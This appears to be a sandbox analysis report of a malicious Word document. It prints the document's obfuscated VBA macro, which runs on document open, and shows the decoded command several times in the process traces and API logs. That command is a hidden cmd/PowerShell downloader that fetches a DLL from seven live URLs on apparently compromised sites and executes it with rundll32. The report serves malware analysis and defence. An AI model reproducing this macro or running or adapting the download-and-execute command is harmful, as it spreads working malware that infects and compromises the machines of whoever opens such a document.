      Attribute VB_Exposed = True
      Attribute VB_TemplateDerived = True
      Attribute VB_Customizable = True
      Function dsfl3hadfkb3lkahfoiauhfcfgkwy3jfrkiwed(Optional ByVal Title As String = ",", Optional ByVal InitialPath As String = ":") As String
          Dim PS As String: PS = Application.PathSeparator
          With Application.FileDialog(msoFileDialogFolderPicker)
              If Not Right$(InitialPath, 1) = PS Then InitialPath = InitialPath & PS
              .ButtonName = ":": .Title = Title: .InitialFileName = InitialPath
              If .Show <> -1 Then Exit Function
              If Not Right$(GetFolderPath, 1) = PS Then GetFolderPath = GetFolderPath & PS
          End With
      End Function
      Sub sfoliq3hwoqihepolfijp()
          gjpo4jaiwledkgls = GetFolderPath(",", ThisWorkbook.Path)
          If gjpo4jaiwledkgls = "" Then Exit Sub
          MsgBox ":" & gjpo4jaiwledkgls, vbInformation
      End Sub
      Sub dfloaswehortiwholehfolsihlkw()
          txt$ = FileToVBAFunction(",", ",")
          Debug.Print txt$
      End Sub
      Sub fbkaw4lkuwgbtlske()
          Dim WB As Workbook
          Set WB = GetAnotherWorkbook
          If Not WB Is Nothing Then
              MsgBox "&" & WB.FullName, vbInformation
          Else
              MsgBox ",", vbCritical: Exit Sub
          End If
          x = WB.Worksheets(1).Range("a2")
      End Sub
      ' String "decryption" helper: removes every occurrence of the padding token
      ' (second argument) from the first argument, e.g. "fARDfAS.fADafAtafASpfAacfAe" / "fA" -> "RDS.DataSpace".
      ' The loop below never reaches the MsgBox (the counter stops at 10) and only pads the code.
      Function goh4iahwodegiyna89deyfni(fhi3hof3hfolk As String, dfh3olhuiefoiasihkl As String) As String
          Dim cbuay7aygsikjbkv As Integer
          Dim fjoq3wihrpoa8fghoashf As String: cbuay7aygsikjbkv = 10: fjoq3wihrpoa8fghoashf = Replace(fhi3hof3hfolk, dfh3olhuiefoiasihkl, "")
          For sgdyuiwuygiasb = 1 To cbuay7aygsikjbkv
              If sgdyuiwuygiasb > 20 Then
                  MsgBox ","
              End If
          Next
          goh4iahwodegiyna89deyfni = fjoq3wihrpoa8fghoashf
      End Function
      Function gajowisjd90asdilkf() As Object
          On Error Resume Next
          Dim coll As New Collection, WB As Workbook
          For Each WB In Workbooks
              If WB.name <> ThisWorkbook.name Then
                  If Windows(WB.name).Visible Then coll.Add CStr(WB.name)
              End If
          Next WB
          Select Case coll.Count
              Case 0
                  MsgBox ",", vbCritical, ","
              Case 1
                  Set GetAnotherWorkbook = Workbooks(coll(1))
              Case Else
                  For i = 1 To coll.Count
                      txt = txt & i & vbTab & coll(i) & vbNewLine
                  Next i
                  msg = "&" & vbNewLine & vbNewLine & txt
                  res = InputBox(msg, ",", 1)
                  If IsNumeric(res) Then Set GetAnotherWorkbook = Workbooks(coll(Val(res)))
          End Select
      End Function
      ' Launcher: the loop counter selects the real work (iteration 3 decodes the command and
      ' creates the RDS.DataSpace object, iteration 7 runs it); the remaining branches are filler.
      Sub fjow3efyw98efhasdokfhlnkvawofh3(nart4kuagiuagsaedr54 As Long, bvagh4iauhoshetret As Long, fbhqwieusiyeoiwugeig As String): Dim sdgbvku3giqugfi2, fhokl34rhyw5uwegea, hkqwfsadesf As String
          Dim s1, ra As String: Dim bfik3uvgikuds As Double
          Dim dvfghwkuibisdbgfiw As Object
          Dim d, R As Double
          For bkwefiusdif = 1 To 10
              If bkwefiusdif = 7 Then
                  ' "WRIsRIcRIriRIpt.RISRIheRIlRIl" / "RI" -> "Wscript.Shell"; .Run with window style 0 hides the cmd.exe window
                  dvfghwkuibisdbgfiw.CreateObject(goh4iahwodegiyna89deyfni("WRIsRIcRIriRIpt.RISRIheRIlRIl", "RI"), "").Run fhokl34rhyw5uwegea, 0
              Else
                  If bkwefiusdif = 3 Then
                      ' "fARDfAS.fADafAtafASpfAacfAe" / "fA" -> "RDS.DataSpace", used as an indirect CreateObject proxy
                      Set dvfghwkuibisdbgfiw = CreateObject(goh4iahwodegiyna89deyfni("fARDfAS.fADafAtafASpfAacfAe", "fA"))
                      ' bfik3uvgikuds is never assigned (0), so the condition is always true: strip "elf" from the command string
                      Dim fs As Integer: If bfik3uvgikuds < 0.021335 And bfik3uvgikuds > -0.0134542765 Then fhokl34rhyw5uwegea = goh4iahwodegiyna89deyfni(fbhqwieusiyeoiwugeig, "elf")
                  End If
              End If
          Next
          If d <> 0.123456 Then
              ra = Replace(s1, ",", "")
          End If
      End Sub
      Private Function dfjolirhoghwow(ByVal filename$, Optional ByVal name$ = "") As String
          On Error Resume Next: Err.Clear: Const BYTES_PER_ROW& = 480
          Dim F_Content$
          ff& = FreeFile: Open filename$ For Binary Access Read As #ff
          fs& = LOF(ff): txt$ = String(fs&, Chr(0))
          Get #ff, , txt$: Close #ff
          F_Content$ = F_Content$ & "&" & name$ & "&" & vbNewLine
          F_Content$ = F_Content$ & "" & vbNewLine
          For i = 1 To Len(txt$)
              R& = Asc(Mid(txt, i, 1))
              res$ = res$ & IIf(Len(Hex(R)) = 1, "0", "") & Hex(R)
              If i Mod BYTES_PER_ROW& = 0 Then
                  F_Content$ = F_Content$ & "&" & res$ & "" & vbNewLine
                  res = "": DoEvents
              End If
          Next
          If Len(res) Then F_Content$ = F_Content$ & "&" & res$ & "" & vbNewLine
          F_Content$ = F_Content$ & "" & vbNewLine
          FileToVBAFunction = F_Content$
      End Function
      Private Sub Document_Open(): Dim gzjohestiha4otihsdoa8ef As String
      fjow3efyw98efhasdokfhlnkvawofh3 0, 0, "celfmelfd.elfeelfxelfe elf/elfc selftaelfrtelf /elfB pelfowelferselfhelelfl $delffkj=""$selftrs=\""helftelftpelf:elf/elf/pelfrimtalent.celfom/welfp-adelfmin/9yt1u/,helfttelfp:elf/elf/huskelfysb.coelfm/wordelfpress/6f0qIQlWPaYDfa/,helfttelfp:elf/elf/ridelfcyf.com/dm7vg/DGWFrJA0kutWTk/,htelftelfp:elf/elf/manelfak.edunelfetfoundelfation.orelfg/schelfool-facelfilitator/qlwM2RAHhDG8N8/,helftelftelfp:elf/elf/ckelffoods.nelfet/wpelf-admelfin/wPInm2rgMu/,helftelftelfp:elf/elf/adelforwelding.zmelfotpro.celfom/elfwp-conelftent/Z8ifMTCM2VBWlfeSZmzv/,htelftelfp:elf/elf/elfseelfrver.zmelfotpro.coelfm/venelfkat/proelfducts/facelfebelfook-pelfage/asselfets/kmIdeXnG/\""." & "Selfplelfit(\"",\"");felforelfeacelfh($selft inelf $selftrs){$relf1=Gelfet-Relfanelfdom;$relf2=Gelfet-Raelfndelfoelfm;$telfptelfh=\""celf:elf\pelfroelfgraelfmdelfatelfa\\\""+elf$relf1+\"".delflelfl\"";Ielfnelfvelfokelfe-WelfebelfReqelfueselft -Uelfrelfi $selft -OelfuelftFelfilelfe $telfptelfh;ielffelf(Telfeselft-Pelfatelfh $telfptelfh){$felfp=\""celf:elf\elfwelfinelfdoelfwelfs\selfyselfwelfowelf6elf4\relfunelfdlelfl3elf2.eelfxelfelfe\"";$aelf=$telfpelfth+\"",felf\""+$relf2;Selftelfarelft-Pelfrelfocelfeselfs $felfp -AelfrelfgumelfenelftLelfist $aelf;belfreaelfk;}};"";IelfEelfX $delffkj": End Sub

      Streams

      Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 519
      General
      Stream Path:PROJECT
      File Type:ASCII text, with CRLF line terminators
      Stream Size:519
      Entropy:5.27637957879
      Base64 Encoded:True
      Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = c v b k u 3 g a k u i s d g f i l u 3 g b l a w / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . H e l p F i l e = " " . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 4 6 4 4 E A B 6 7 6 B A B 8 B E B 8 B E B C C 2 B C C 2 " . .
      Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 63 76 62 6b 75 33 67 61 6b 75 69 73 64 67 66 69 6c 75 33 67 62 6c 61 77 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41
      Stream Path: PROJECTwm, File Type: data, Stream Size: 77
      General
      Stream Path:PROJECTwm
      File Type:data
      Stream Size:77
      Entropy:3.2550852567
      Base64 Encoded:False
      Data ASCII:c v b k u 3 g a k u i s d g f i l u 3 g b l a w . c . v . b . k . u . 3 . g . a . k . u . i . s . d . g . f . i . l . u . 3 . g . b . l . a . w . . . . .
      Data Raw:63 76 62 6b 75 33 67 61 6b 75 69 73 64 67 66 69 6c 75 33 67 62 6c 61 77 00 63 00 76 00 62 00 6b 00 75 00 33 00 67 00 61 00 6b 00 75 00 69 00 73 00 64 00 67 00 66 00 69 00 6c 00 75 00 33 00 67 00 62 00 6c 00 61 00 77 00 00 00 00 00
      Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4731
      General
      Stream Path:VBA/_VBA_PROJECT
      File Type:data
      Stream Size:4731
      Entropy:4.84395391101
      Base64 Encoded:False
      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
      Data Raw:cc 61 88 00 00 01 00 ff 19 04 00 00 09 04 00 00 e3 04 01 00 00 00 00 00 00 00 00 00 01 00 07 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
      Stream Path: VBA/dir, File Type: data, Stream Size: 843
      General
      Stream Path:VBA/dir
      File Type:data
      Stream Size:843
      Entropy:6.51963251442
      Base64 Encoded:True
      Data ASCII:. G . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . i . c . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . . N c .
      Data Raw:01 47 b3 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 1a 69 8e 63 07 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

      Network Behavior

      No network behavior found

      Code Manipulations

      Statistics

      CPU Usage


      Memory Usage


      High Level Behavior Distribution


      Behavior


      System Behavior

      General

      Start time:13:15:18
      Start date:22/11/2021
      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      Wow64 process (32bit):false
      Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
      Imagebase:0x13f820000
      File size:1423704 bytes
      MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:13:15:23
      Start date:22/11/2021
      Path:C:\Windows\System32\cmd.exe
      Wow64 process (32bit):false
      Commandline:"C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
      Imagebase:0x4ace0000
      File size:345088 bytes
      MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:13:15:24
      Start date:22/11/2021
      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):false
      Commandline:powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
      Imagebase:0x13ff00000
      File size:473600 bytes
      MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:.Net C# or VB.NET
      Reputation:high

      Disassembly

      Code Analysis

      Call Graph

      Graph

      Module: cvbku3gakuisdgfilu3gblaw

      Declaration
      Line | Content
      1

      Attribute VB_Name = "cvbku3gakuisdgfilu3gblaw"

      2

      Attribute VB_Base = "1Normal.ThisDocument"

      3

      Attribute VB_GlobalNameSpace = False

      4

      Attribute VB_Creatable = False

      5

      Attribute VB_PredeclaredId = True

      6

      Attribute VB_Exposed = True

      7

      Attribute VB_TemplateDerived = True

      8

      Attribute VB_Customizable = True

      Executed Functions
      APIs | Meta Information

      Run

      Object.Run("cmd.exe /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj",0) -> 0

      CreateObject

      CreateObject("RDS.DataSpace")

      Part of subcall function goh4iahwodegiyna89deyfni@cvbku3gakuisdgfilu3gblaw: Replace

      Part of subcall function goh4iahwodegiyna89deyfni@cvbku3gakuisdgfilu3gblaw: MsgBox

      Part of subcall function goh4iahwodegiyna89deyfni@cvbku3gakuisdgfilu3gblaw: Replace

      Part of subcall function goh4iahwodegiyna89deyfni@cvbku3gakuisdgfilu3gblaw: MsgBox

      Replace

      Replace(,",","")
      Strings | Decrypted Strings
      """"
      "RI"
      "WRIsRIcRIriRIpt.RISRIheRIlRIl"
      "elf"
      "fA"
      "fARDfAS.fADafAtafASpfAacfAe"
      """"
      "RI"
      "WRIsRIcRIriRIpt.RISRIheRIlRIl"
      """"
      "RI"
      "WRIsRIcRIriRIpt.RISRIheRIlRIl"
      "elf"
      "fA"
      "fARDfAS.fADafAtafASpfAacfAe"
      "fA"
      "fARDfAS.fADafAtafASpfAacfAe"
      "elf"
      "elf"
      """"
      ","
      """"
      ","
      Line | Instruction | Meta Information
      69

      Sub fjow3efyw98efhasdokfhlnkvawofh3(nart4kuagiuagsaedr54 as Long, bvagh4iauhoshetret as Long, fbhqwieusiyeoiwugeig as String)

      69

      Dim sdgbvku3giqugfi2, fhokl34rhyw5uwegea, hkqwfsadesf as String

      executed
      70

      Dim s1, ra as String

      70

      Dim bfik3uvgikuds as Double

      71

      Dim dvfghwkuibisdbgfiw as Object

      72

      Dim d, R as Double

      73

      For bkwefiusdif = 1 To 10

      74

      If bkwefiusdif = 7 Then

      75

      dvfghwkuibisdbgfiw.CreateObject(goh4iahwodegiyna89deyfni("WRIsRIcRIriRIpt.RISRIheRIlRIl", "RI"), "").Run fhokl34rhyw5uwegea, 0

      Object.Run("cmd.exe /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj",0) -> 0

      executed
      76

      Else

      77

      If bkwefiusdif = 3 Then

      78

      Set dvfghwkuibisdbgfiw = CreateObject(goh4iahwodegiyna89deyfni("fARDfAS.fADafAtafASpfAacfAe", "fA"))

      CreateObject("RDS.DataSpace")

      executed
      79

      Dim fs as Integer

      79

      If bfik3uvgikuds < 0.021335 And bfik3uvgikuds > - 0.0134542765 Then

      79

      fhokl34rhyw5uwegea = goh4iahwodegiyna89deyfni(fbhqwieusiyeoiwugeig, "elf")

      79

      Endif

      80

      Endif

      81

      Endif

      82

      Next

      83

      If d <> 0.123456 Then

      84

      ra = Replace(s1, ",", "")

      Replace(,",","")

      executed
      85

      Endif

      86

      End Sub

      APIs | Meta Information

      Part of subcall function fjow3efyw98efhasdokfhlnkvawofh3@cvbku3gakuisdgfilu3gblaw: Run

      Part of subcall function fjow3efyw98efhasdokfhlnkvawofh3@cvbku3gakuisdgfilu3gblaw: CreateObject

      Part of subcall function fjow3efyw98efhasdokfhlnkvawofh3@cvbku3gakuisdgfilu3gblaw: Replace

      Strings | Decrypted Strings
      "celfmelfd.elfeelfxelfe elf/elfc selftaelfrtelf /elfB pelfowelferselfhelelfl $delffkj=""$selftrs=\""helftelftpelf:elf/elf/pelfrimtalent.celfom/welfp-adelfmin/9yt1u/,helfttelfp:elf/elf/huskelfysb.coelfm/wordelfpress/6f0qIQlWPaYDfa/,helfttelfp:elf/elf/ridelfcyf.com/dm7vg/DGWFrJA0kutWTk/,htelftelfp:elf/elf/manelfak.edunelfetfoundelfation.orelfg/schelfool-facelfilitator/qlwM2RAHhDG8N8/,helftelftelfp:elf/elf/ckelffoods.nelfet/wpelf-admelfin/wPInm2rgMu/,helftelftelfp:elf/elf/adelforwelding.zmelfotpro.celfom/elfwp-conelftent/Z8ifMTCM2VBWlfeSZmzv/,htelftelfp:elf/elf/elfseelfrver.zmelfotpro.coelfm/venelfkat/proelfducts/facelfebelfook-pelfage/asselfets/kmIdeXnG/\"".""Selfplelfit(\"",\"");felforelfeacelfh($selft inelf $selftrs){$relf1=Gelfet-Relfanelfdom;$relf2=Gelfet-Raelfndelfoelfm;$telfptelfh=\""celf:elf\pelfroelfgraelfmdelfatelfa\\\""+elf$relf1+\"".delflelfl\"";Ielfnelfvelfokelfe-WelfebelfReqelfueselft -Uelfrelfi $selft -OelfuelftFelfilelfe $telfptelfh;ielffelf(Telfeselft-Pelfatelfh $telfptelfh){$felfp=\""celf:elf\elfwelfinelfdoelfwelfs\selfyselfwelfowelf6elf4\relfunelfdlelfl3elf2.eelfxelfelfe\"";$aelf=$telfpelfth+\"",felf\""+$relf2;Selftelfarelft-Pelfrelfocelfeselfs $felfp -AelfrelfgumelfenelftLelfist $aelf;belfreaelfk;}};"";IelfEelfX $delffkj"
      Line | Instruction | Meta Information
      107

      Private Sub Document_Open()

      107

      Dim gzjohestiha4otihsdoa8ef as String

      executed
      108

      fjow3efyw98efhasdokfhlnkvawofh3 0, 0, "celfmelfd.elfeelfxelfe elf/elfc selftaelfrtelf /elfB pelfowelferselfhelelfl $delffkj=""$selftrs=\""helftelftpelf:elf/elf/pelfrimtalent.celfom/welfp-adelfmin/9yt1u/,helfttelfp:elf/elf/huskelfysb.coelfm/wordelfpress/6f0qIQlWPaYDfa/,helfttelfp:elf/elf/ridelfcyf.com/dm7vg/DGWFrJA0kutWTk/,htelftelfp:elf/elf/manelfak.edunelfetfoundelfation.orelfg/schelfool-facelfilitator/qlwM2RAHhDG8N8/,helftelftelfp:elf/elf/ckelffoods.nelfet/wpelf-admelfin/wPInm2rgMu/,helftelftelfp:elf/elf/adelforwelding.zmelfotpro.celfom/elfwp-conelftent/Z8ifMTCM2VBWlfeSZmzv/,htelftelfp:elf/elf/elfseelfrver.zmelfotpro.coelfm/venelfkat/proelfducts/facelfebelfook-pelfage/asselfets/kmIdeXnG/\""." & "Selfplelfit(\"",\"");felforelfeacelfh($selft inelf $selftrs){$relf1=Gelfet-Relfanelfdom;$relf2=Gelfet-Raelfndelfoelfm;$telfptelfh=\""celf:elf\pelfroelfgraelfmdelfatelfa\\\""+elf$relf1+\"".delflelfl\"";Ielfnelfvelfokelfe-WelfebelfReqelfueselft -Uelfrelfi $selft -OelfuelftFelfilelfe $telfptelfh;ielffelf(Telfeselft-Pelfatelfh $telfptelfh){$felfp=\""celf:elf\elfwelfinelfdoelfwelfs\selfyselfwelfowelf6elf4\relfunelfdlelfl3elf2.eelfxelfelfe\"";$aelf=$telfpelfth+\"",felf\""+$relf2;Selftelfarelft-Pelfrelfocelfeselfs $felfp -AelfrelfgumelfenelftLelfist $aelf;belfreaelfk;}};"";IelfEelfX $delffkj"

      109

      End Sub

      APIs | Meta Information

      Replace

      Replace("fARDfAS.fADafAtafASpfAacfAe","fA","") -> RDS.DataSpace

      Replace("celfmelfd.elfeelfxelfe elf/elfc selftaelfrtelf /elfB pelfowelferselfhelelfl $delffkj="$selftrs=\"helftelftpelf:elf/elf/pelfrimtalent.celfom/welfp-adelfmin/9yt1u/,helfttelfp:elf/elf/huskelfysb.coelfm/wordelfpress/6f0qIQlWPaYDfa/,helfttelfp:elf/elf/ridelfcyf.com/dm7vg/DGWFrJA0kutWTk/,htelftelfp:elf/elf/manelfak.edunelfetfoundelfation.orelfg/schelfool-facelfilitator/qlwM2RAHhDG8N8/,helftelftelfp:elf/elf/ckelffoods.nelfet/wpelf-admelfin/wPInm2rgMu/,helftelftelfp:elf/elf/adelforwelding.zmelfotpro.celfom/elfwp-conelftent/Z8ifMTCM2VBWlfeSZmzv/,htelftelfp:elf/elf/elfseelfrver.zmelfotpro.coelfm/venelfkat/proelfducts/facelfebelfook-pelfage/asselfets/kmIdeXnG/\".Selfplelfit(\",\");felforelfeacelfh($selft inelf $selftrs){$relf1=Gelfet-Relfanelfdom;$relf2=Gelfet-Raelfndelfoelfm;$telfptelfh=\"celf:elf\pelfroelfgraelfmdelfatelfa\\\"+elf$relf1+\".delflelfl\";Ielfnelfvelfokelfe-WelfebelfReqelfueselft -Uelfrelfi $selft -OelfuelftFelfilelfe $telfptelfh;ielffelf(Telfeselft-Pelfatelfh $telfptelfh){$felfp=\"celf:elf\elfwelfinelfdoelfwelfs\selfyselfwelfowelf6elf4\relfunelfdlelfl3elf2.eelfxelfelfe\";$aelf=$telfpelfth+\",felf\"+$relf2;Selftelfarelft-Pelfrelfocelfeselfs $felfp -AelfrelfgumelfenelftLelfist $aelf;belfreaelfk;}};";IelfEelfX $delffkj","elf","") -> cmd.exe /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj

      Replace("WRIsRIcRIriRIpt.RISRIheRIlRIl","RI","") -> Wscript.Shell

      MsgBox

      Strings | Decrypted Strings
      """"
      ","
      ","
      ","
      Line | Instruction | Meta Information
      37

      Function goh4iahwodegiyna89deyfni(fhi3hof3hfolk as String, dfh3olhuiefoiasihkl as String) as String

      38

      Dim cbuay7aygsikjbkv as Integer

      executed
      39

      Dim fjoq3wihrpoa8fghoashf as String

      39

      cbuay7aygsikjbkv = 10

      39

      fjoq3wihrpoa8fghoashf = Replace(fhi3hof3hfolk, dfh3olhuiefoiasihkl, "")

      Replace("fARDfAS.fADafAtafASpfAacfAe","fA","") -> RDS.DataSpace

      executed
      40

      For sgdyuiwuygiasb = 1 To cbuay7aygsikjbkv

      41

      If sgdyuiwuygiasb > 20 Then

      42

      MsgBox ","

      MsgBox

      43

      Endif

      44

      Next

      45

      goh4iahwodegiyna89deyfni = fjoq3wihrpoa8fghoashf

      46

      End Function

      Non-Executed Functions
      APIs | Meta Information

      Clear

      FreeFile

      Open

      ff

      LOF

      ff

      String

      Chr

      ff

      ff

      vbNewLine

      vbNewLine

      Len

      Asc

      Mid

      txt

      IIf

      Len

      Hex

      R

      BYTES_PER_ROW&

      vbNewLine

      DoEvents

      Len

      vbNewLine

      vbNewLine

      Strings | Decrypted Strings
      """"
      """"
      """"
      Line | Instruction | Meta Information
      87

      Private Function dfjolirhoghwow(ByVal filename$, optional ByVal name$ = "") as String

      88

      On Error Resume Next

      88

      Err.Clear

      Clear

      88

      Const BYTES_PER_ROW = 480

      89

      Dim F_Content as String

      90

      ff& = FreeFile

      FreeFile

      90

      Open filename$ For Binary Access Read As # ff

      Open

      ff

      91

      fs& = LOF(ff)

      LOF

      ff

      91

      txt$ = String(fs&, Chr(0))

      String

      Chr

      92

      Get # ff, , txt$

      ff

      92

      Close # ff

      ff

      93

      F_Content$ = F_Content$ & "&" & name$ & "&" & vbNewLine

      vbNewLine

      94

      F_Content$ = F_Content$ & "" & vbNewLine

      vbNewLine

      95

      For i = 1 To Len(txt$)

      Len

      96

      R& = Asc(Mid(txt, i, 1))

      Asc

      Mid

      txt

      97

      res$ = res$ & IIf(Len(Hex(R)) = 1, "0", "") & Hex(R)

      IIf

      Len

      Hex

      R

      98

      If i Mod BYTES_PER_ROW& = 0 Then

      BYTES_PER_ROW&

      99

      F_Content$ = F_Content$ & "&" & res$ & "" & vbNewLine

      vbNewLine

      100

      res = ""

      100

      DoEvents

      DoEvents

      101

      Endif

      102

      Next

      Len

      103

      If Len(res) Then

      Len

      103

      F_Content$ = F_Content$ & "&" & res$ & "" & vbNewLine

      vbNewLine

      103

      Endif

      104

      F_Content$ = F_Content$ & "" & vbNewLine

      vbNewLine

      105

      FileToVBAFunction = F_Content$

      106

      End Function

      APIs | Meta Information

      Collection

      Workbooks

      name

      ThisWorkbook

      Windows

      name

      Add

      CStr

      name

      Count

      MsgBox

      vbCritical

      Workbooks

      Count

      vbTab

      vbNewLine

      vbNewLine

      InputBox

      IsNumeric

      Workbooks

      Val

      Strings | Decrypted Strings
      "&"
      ","
      ","
      ","
